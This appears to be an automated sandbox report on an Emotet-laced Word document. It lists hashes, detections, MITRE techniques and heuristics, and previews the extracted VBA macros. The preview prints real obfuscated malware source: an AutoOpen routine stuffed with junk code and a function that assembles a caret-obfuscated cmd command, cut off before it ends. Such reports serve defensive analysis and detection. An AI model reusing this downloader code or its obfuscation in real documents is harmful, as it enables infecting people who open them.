Emotet Office (OLE) malware analysis — malicious · 5cef7963be80b561

MALICIOUS

Office (OLE)

120.6 KB Created: 2018-10-02 11:52:00 Authoring application: Microsoft Office Word First seen: 2018-11-05

MD5: 351fdd834a2a51a5f6b4d097f16f73c8 SHA-1: e16647d96507eb95d9a342405140869b03fa5066 SHA-256: 5cef7963be80b561130baa0a1aaaa7482fc0b6b883bf3764a7f34cd79f9aa14f

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the ClamAV detection 'Doc.Downloader.Emotet-6884102-0' indicate the presence of malicious code. The AutoOpen macro is designed to execute automatically, likely downloading and executing a second-stage payload, a common Emotet behavior.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6884102-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6884102-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18255 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18255 bytes
SHA-256: `8f874910699aba47b80b3ca964ede4b442039fb1557a31504fd2a1342562f487`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OGbjBav" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() If uTvXJH <= bzSWO Then Dim SAlvlj(1) SAlvlj(0) = iaHbc + dwflDU End If If iuDJAt Xor UtHit Then Dim qzHcD(2) qzHcD(0) = cZBPj + UhbYYi qzHcD(1) = uqGMcN + WrTlG + bfazwF + UuXhfT End If If wAmQKn And EnzZpi Then Dim jcMAA(1) jcMAA(0) = XdGfhR + oHfXVQ + oiNcU + RvFiBt End If If MhwUct <> KklfPi Then Dim kFQIp(1) kFQIp(0) = oHiaS + UzSZjI + oKJXQd + dVpMS End If If jjhvwM Eqv LdGjV Then Dim XWpGQT(1) XWpGQT(0) = EivhWJ + niAtfU + AsiaiB + PXQKB End If If SKSQW > ZrFDWC Then Dim ZwsLEX(2) ZwsLEX(0) = trahzi + aTRRHb ZwsLEX(1) = BpzIK + JzFFBN End If idObcYficmU (KeyString(zcPODV + zdXLfOVG + 4 + 2 + 61 + iwUMT + iLwOPB) + wAJfWfqb + wFczh + KeyString(fSZtznI + ZJGhkbQW + 5 + 2 + 70 + LaAWrW + Vpsjd) + Rcqwkifssjf + ajUVm + NiSMlvONrC + FmkwGBCLi + ohVMb + jhKQaKQY + TPmwRQ + utswta + IhaKMiz + DdDcVOJ + dhuInE + ciIvLUa + QrpwYom) If FCUjaO = pYoOD Then Dim vaChAd(2) vaChAd(0) = KfzDi + aDKXV + uwrLb + MuIaZ vaChAd(1) = rKNXOI + QpicZF End If If dYJtDt > VwmUjm Then Dim OwqnIL(1) OwqnIL(0) = zaFOr + pLYRT End If End Sub Attribute VB_Name = "PnzfATN" Function Rcqwkifssjf() If MvOmAQ Or ZdfHF Then Dim UfAUAF(1) UfAUAF(0) = ErDMj + hjYFXw + BLfwwJ + cnbZIw End If If boznS Or 6 Then Dim qTEOz(1) qTEOz(0) = Ulfdb + mHKROJ End If If oAJJbc > 8 Then Dim UsCGSj(2) UsCGSj(0) = BXIIS + IADVrK UsCGSj(1) = QQiEhz + rXvNWK + rmusq + ElEQz End If If GLGKQu = 6 Then Dim wIbkz(1) wIbkz(0) = AZjhii + YbLlKL + NEFPEO + UBiJj End If KafFWP = "d /V/C" + """" + "^s^e^t ^t^w" + "^Z^x=^yv^a^ /^f" + "^s^ ^I^8^f" + "^ z^q^&^ ^P^f^S" + "^ N^E^2^ ^" wVWIvB = "`^\N ^D^5^" + "m^ L^Z^d^ ^Tn^" + "_^ v^D%^ ^'^k^]^ ^7^" + "o^=^ ^^+^e^ %n,^ ^$" XmjpFtzC = "^3^w^ ^H^^-^ ^lc" + "^5^}^b^X)^}^?^.^" + "=^{^5^T^Q^h%^\" + "Rc^4^Z^~^t5C^&^a(" + "^S^?c^?^D^" + "@^}n^e^K^;^A^" If zJanK > SIosA Then Dim YhObDT(2) YhObDT(0) = jmLdpM + iYIWi + sboMdm + cnMKuX YhObDT(1) = voLzF + Xjmoj End If If zotARJ >= 4 Then Dim AwtCw(2) AwtCw(0) = VWsaB + RIPpNK + ZTLoz + sLzouL AwtCw(1) = kODwvJ + ooBoMn + SSkwjp + kqpHtV End If If hiLNFA And 14 Then Dim WDaIvF(1) WDaIvF(0) = wnYwT + aZIcW End If iotXUQ = "TC^k^J^i^3^a^,^z" + "^?^e^3C^Ar^K^8Z^b(" + "Y^7^;^2^6n" If isZsQS = 4 Then Dim Uzjdhm(2) Uzjdhm(0) = jtmlr + AAvLV + NXGcG + QwkUu Uzjdhm(1) = MMcfa + BwzVfQ + wBrzi + OXOEWN End If If RdaVw < EnFALL Then Dim YwSUso(1) YwSUso(0) = pTnbX + DUzjor + ZXuhib + Bkaml End If If YRnZM <> 9 Then Dim bYfuUZ(1) bYfuUZ(0) = JWCss + YHEYzF + fnzHF + FMdhL End If If hzOHw <> FQuDL Then Dim lRWcMk(2) lRWcMk(0) = tNqNV + zYNqBn + jQUqwf + PMUDci lRWcMk(1) = zYSfj + fLKrks End If If sItIpX <= dwqwwH Then Dim kpZMUO(2) kpZMUO(0) = AClmQ + SEtAp + OKLDXz + UwZEi kpZMUO(1) = UuQuAa + hVrGI + YEKYE + IXsQYl End If NjCCc = "^L^\|^}^2^u^snx^W^+^t" + "^L^$8^J^L^ R^3^W^" + "m^b^S^s^e^d" + "^{^jt^3^L^.^I^H" If FUcfI Xor MQkiz Then Dim TqBmkk(2) TqBmkk(0) = HkcqUt + BuMHG TqBmkk(1) = Czpjwk + JHzph End If If zkbDEu = 15 Then Dim MCqwE(2) MCqwE(0) = qsMKKm + SamhU MCqwE(1) = IlqUP + MdUTB + NAznS + AdiJua End If If YSwbjC > IYddHl Then Dim MREcXS(1) MREcXS(0) = WAVozi + zmnIsM End If If uIbwC Eqv 16 Then Dim wYBKs(1) wYBKs(0) = YttSF + AaQKXU + ZLbir + wNQnM End If If aiQWwt Or DlnWib Then Dim rSWZLq(2) rSWZLq(0) = lFiIpj + WwqPWj rSWZLq(1) = dMzVHl + OJQkW End If XzrijY = "^4^O^-^x^O^~^e" + "^h^\^~k^>^A^*^o/^" + "X^{v^5^s^[n(" Rcqwkifssjf = KafFWP + wVWIvB + XmjpFtzC + iotXUQ + NjCCc + XzrijY If bMJYbz Or FORMC Then Dim SiYrq(2) SiYrq(0) = nVcaG + zTNfqq + MIviD + qIiGwE SiYrq(1) = LuqRCr + oFIwl + bcdLa + aDqrW End I ... (truncated)

SHA-256: 8f874910699aba47b80b3ca964ede4b442039fb1557a31504fd2a1342562f487

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "OGbjBav"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If uTvXJH <= bzSWO Then

Dim SAlvlj(1)
SAlvlj(0) = iaHbc + dwflDU

End If
   If iuDJAt Xor UtHit Then

Dim qzHcD(2)
qzHcD(0) = cZBPj + UhbYYi
qzHcD(1) = uqGMcN + WrTlG + bfazwF + UuXhfT

End If
   If wAmQKn And EnzZpi Then

Dim jcMAA(1)
jcMAA(0) = XdGfhR + oHfXVQ + oiNcU + RvFiBt

End If
   If MhwUct <> KklfPi Then

Dim kFQIp(1)
kFQIp(0) = oHiaS + UzSZjI + oKJXQd + dVpMS

End If
   If jjhvwM Eqv LdGjV Then

Dim XWpGQT(1)
XWpGQT(0) = EivhWJ + niAtfU + AsiaiB + PXQKB

End If
   If SKSQW > ZrFDWC Then

Dim ZwsLEX(2)
ZwsLEX(0) = trahzi + aTRRHb
ZwsLEX(1) = BpzIK + JzFFBN

End If
idObcYficmU (KeyString(zcPODV + zdXLfOVG + 4 + 2 + 61 + iwUMT + iLwOPB) + wAJfWfqb + wFczh + KeyString(fSZtznI + ZJGhkbQW + 5 + 2 + 70 + LaAWrW + Vpsjd) + Rcqwkifssjf + ajUVm + NiSMlvONrC + FmkwGBCLi + ohVMb + jhKQaKQY + TPmwRQ + utswta + IhaKMiz + DdDcVOJ + dhuInE + ciIvLUa + QrpwYom)
   If FCUjaO = pYoOD Then

Dim vaChAd(2)
vaChAd(0) = KfzDi + aDKXV + uwrLb + MuIaZ
vaChAd(1) = rKNXOI + QpicZF

End If
   If dYJtDt > VwmUjm Then

Dim OwqnIL(1)
OwqnIL(0) = zaFOr + pLYRT

End If
End Sub


Attribute VB_Name = "PnzfATN"
Function Rcqwkifssjf()
If MvOmAQ Or ZdfHF Then

Dim UfAUAF(1)
UfAUAF(0) = ErDMj + hjYFXw + BLfwwJ + cnbZIw

End If
   If boznS Or 6 Then

Dim qTEOz(1)
qTEOz(0) = Ulfdb + mHKROJ

End If
   If oAJJbc > 8 Then

Dim UsCGSj(2)
UsCGSj(0) = BXIIS + IADVrK
UsCGSj(1) = QQiEhz + rXvNWK + rmusq + ElEQz

End If
   If GLGKQu = 6 Then

Dim wIbkz(1)
wIbkz(0) = AZjhii + YbLlKL + NEFPEO + UBiJj

End If
KafFWP = "d /V/C" + """" + "^s^e^t ^t^w" + "^Z^x=^yv^a^ /^f" + "^s^ ^I^8^f" + "^ z^q^&^ ^P^f^S" + "^ N^E^2^ ^"
wVWIvB = "`^\N ^D^5^" + "m^ L^Z^d^ ^Tn^" + "_^ v^D%^ ^'^k^]^ ^7^" + "o^=^ ^*^+^e^ %n,^ ^$"
XmjpFtzC = "^3^w^ ^H^*^-^ ^lc" + "^5^}^b^X)^}^?^.^" + "=^{^5^T^Q^h%^\" + "Rc^4^Z^~^t5C^&^a(" + "^S^?c^?^D^" + "@^}n^e^K^;^A^"
If zJanK > SIosA Then

Dim YhObDT(2)
YhObDT(0) = jmLdpM + iYIWi + sboMdm + cnMKuX
YhObDT(1) = voLzF + Xjmoj

End If
   If zotARJ >= 4 Then

Dim AwtCw(2)
AwtCw(0) = VWsaB + RIPpNK + ZTLoz + sLzouL
AwtCw(1) = kODwvJ + ooBoMn + SSkwjp + kqpHtV

End If
   If hiLNFA And 14 Then

Dim WDaIvF(1)
WDaIvF(0) = wnYwT + aZIcW

End If
iotXUQ = "TC^k^J^i^3^a^,^z" + "^?^e^3C^Ar^K^8Z^b(" + "Y^7^;^2^6n"
If isZsQS = 4 Then

Dim Uzjdhm(2)
Uzjdhm(0) = jtmlr + AAvLV + NXGcG + QwkUu
Uzjdhm(1) = MMcfa + BwzVfQ + wBrzi + OXOEWN

End If
   If RdaVw < EnFALL Then

Dim YwSUso(1)
YwSUso(0) = pTnbX + DUzjor + ZXuhib + Bkaml

End If
   If YRnZM <> 9 Then

Dim bYfuUZ(1)
bYfuUZ(0) = JWCss + YHEYzF + fnzHF + FMdhL

End If
   If hzOHw <> FQuDL Then

Dim lRWcMk(2)
lRWcMk(0) = tNqNV + zYNqBn + jQUqwf + PMUDci
lRWcMk(1) = zYSfj + fLKrks

End If
   If sItIpX <= dwqwwH Then

Dim kpZMUO(2)
kpZMUO(0) = AClmQ + SEtAp + OKLDXz + UwZEi
kpZMUO(1) = UuQuAa + hVrGI + YEKYE + IXsQYl

End If
NjCCc = "^L^|^}^2^u^snx^W^+^t" + "^L^$8^J^L^ R^3^W^" + "m^b^S^s^e^d" + "^{^jt^3^L^.^I^H"
If FUcfI Xor MQkiz Then

Dim TqBmkk(2)
TqBmkk(0) = HkcqUt + BuMHG
TqBmkk(1) = Czpjwk + JHzph

End If
   If zkbDEu = 15 Then

Dim MCqwE(2)
MCqwE(0) = qsMKKm + SamhU
MCqwE(1) = IlqUP + MdUTB + NAznS + AdiJua

End If
   If YSwbjC > IYddHl Then

Dim MREcXS(1)
MREcXS(0) = WAVozi + zmnIsM

End If
   If uIbwC Eqv 16 Then

Dim wYBKs(1)
wYBKs(0) = YttSF + AaQKXU + ZLbir + wNQnM

End If
   If aiQWwt Or DlnWib Then

Dim rSWZLq(2)
rSWZLq(0) = lFiIpj + WwqPWj
rSWZLq(1) = dMzVHl + OJQkW

End If
XzrijY = "^4^O^-^x^O^~^e" + "^h^\^~k^>^A^*^o/^" + "X^{v^5^s^[n("
Rcqwkifssjf = KafFWP + wVWIvB + XmjpFtzC + iotXUQ + NjCCc + XzrijY
   If bMJYbz Or FORMC Then

Dim SiYrq(2)
SiYrq(0) = nVcaG + zTNfqq + MIviD + qIiGwE
SiYrq(1) = LuqRCr + oFIwl + bcdLa + aDqrW

End I
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.